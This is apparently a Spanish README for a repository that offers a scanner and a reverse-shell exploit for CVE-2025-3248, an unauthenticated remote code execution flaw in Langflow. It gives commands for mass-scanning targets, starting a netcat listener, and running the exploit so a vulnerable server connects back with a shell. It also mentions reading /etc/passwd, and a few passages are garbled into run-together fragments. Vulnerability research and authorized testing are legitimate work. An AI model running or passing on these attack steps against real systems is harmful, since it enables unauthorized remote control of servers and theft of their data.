
Escáner y exploit para CVE-2025-3248, una RCE no autenticada en Langflow AI. Incluye un verificador de vulnerabilidades y un generador de payloads de reverse shell para pruebas de seguridad autorizadas.
Este repositorio contiene dos scripts de Python:
LangflowCheck.py: Un escáner que verifica instancias de Langflow AI vulnerables a CVE-2025-3248.exploit.py: Un exploit funcional de reverse shell para objetivos Langflow vulnerables.CVE-2025-3248 es una vulnerabilidad crítica en Langflow AI que permite a atacantes no autenticados ejecutar código Python arbitrario de forma remota mediante un payload manipulado enviado a /api/v1/validate/code.
LangflowCheck.py/etc/passwd.exploit.pylhost) y el puerto del listener (lport).exploit.log.pip install -r requirements.txt
URL única
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

Múltiples Objetivos
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

Primero, inicie un listener
sudo nc -nvlp 4444

Luego, ejecute el exploit:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

Debería recibir una shell si el objetivo es vulnerable.

Este exploit es solo para fines educativos y pruebas de seguridad autorizadas. No lo utilice contra sistemas que no posea o para los cuales no tenga permiso explícito.